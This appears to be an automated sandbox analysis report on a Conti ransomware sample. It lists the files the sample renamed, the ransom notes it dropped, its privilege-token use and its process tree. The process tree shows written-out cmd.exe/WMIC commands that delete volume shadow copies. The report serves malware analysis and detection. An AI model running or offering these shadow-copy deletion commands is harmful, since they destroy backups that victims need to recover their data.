Max time network
1572s
Command Line
Signatures
Conti Ransomware
Renames multiple (7995) files with added filename extension
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\R3ADM3.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
Reads user/profile data of web browsers
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Microsoft Games\Chess\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\FreeCell\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Desktop\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Links\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Public\Pictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Public\Videos\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\G2KVEH0D\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Public\Music\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\Stationery\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Favorites\Links for United States\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\Mahjong\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Documents\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Saved Games\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Videos\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Public\Music\Sample Music\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Public\Recorded TV\Sample Media\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\7JXML4U5\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Favorites\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\Hearts\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Public\Desktop\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Favorites\Links\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Public\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\Solitaire\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Contacts\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Searches\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Public\Documents\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Public\Downloads\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Public\Libraries\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Public\Pictures\Sample Pictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Public\Videos\Sample Videos\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\CNQY6MQU\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Music\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Public\Recorded TV\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\Purble Place\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\72EHROQQ\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02404_.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\feature.xml | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\msadc\handsafe.reg | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\management-agent.jar | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099202.GIF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105388.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00934_.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\MARQUEE.POC | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\include\jvmti.h | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0299763.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10254_.GIF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\vlc.mo | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\tt\LC_MESSAGES\vlc.mo | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FRENCH.LNG | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105306.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL083.XML | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\SPPlugins\ADMPlugin.apl | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Etc\GMT+2 | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Riga | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-modules-favorites.xml_hidden | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382930.JPG | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\BG_ADOBE.GIF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Bibliography\Style\ISO690.XSL | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+8 | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-multiview.jar | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-masterfs.xml | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\VIEW.ICO | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0182902.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0241781.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309705.JPG | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.nl_zh_4.4.0.v20140623020002.jar | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\rtf_choosefont.gif | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR45B.GIF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00129_.GIF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\R3ADM3.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\R3ADM3.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0332364.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\db\bin\sysinfo.bat | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\STUDIO\PREVIEW.GIF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR43B.GIF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.ui.ja_5.5.0.165303.jar | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\flight_recorder.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Premium.css | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\fontconfig.properties.src | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File created | C:\Program Files\Java\jre7\lib\zi\America\Indiana\R3ADM3.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\PRODIGY.NET.XML | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Push\push_title.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.io_8.1.14.v20131031.jar | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.util_8.1.14.v20131031.jar | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\feature.xml | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309480.JPG | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Pacific\Pago_Pago | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Beige.css | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\feature.properties | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-filesystems.xml | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\EADOCUMENTAPPROVAL_REVIEW.XSN | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_precomp_matte.wmv | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR28F.GIF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolIcons\StatusOnline.ico | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-attach.xml | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0313974.JPG | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Dawson | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\lua\http\images\Back-48.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\cmd.exe
cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{84B23760-D083-4387-974D-3C4546D42F6A}'" delete
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{84B23760-D083-4387-974D-3C4546D42F6A}'" delete
C:\Windows\system32\cmd.exe
cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{7F4FF19A-F0A9-4D37-804C-BBA1AC496F39}'" delete
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{7F4FF19A-F0A9-4D37-804C-BBA1AC496F39}'" delete
C:\Windows\system32\cmd.exe
cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{9F6E7A5F-91E3-42B9-9E2A-D87FADA45EB4}'" delete
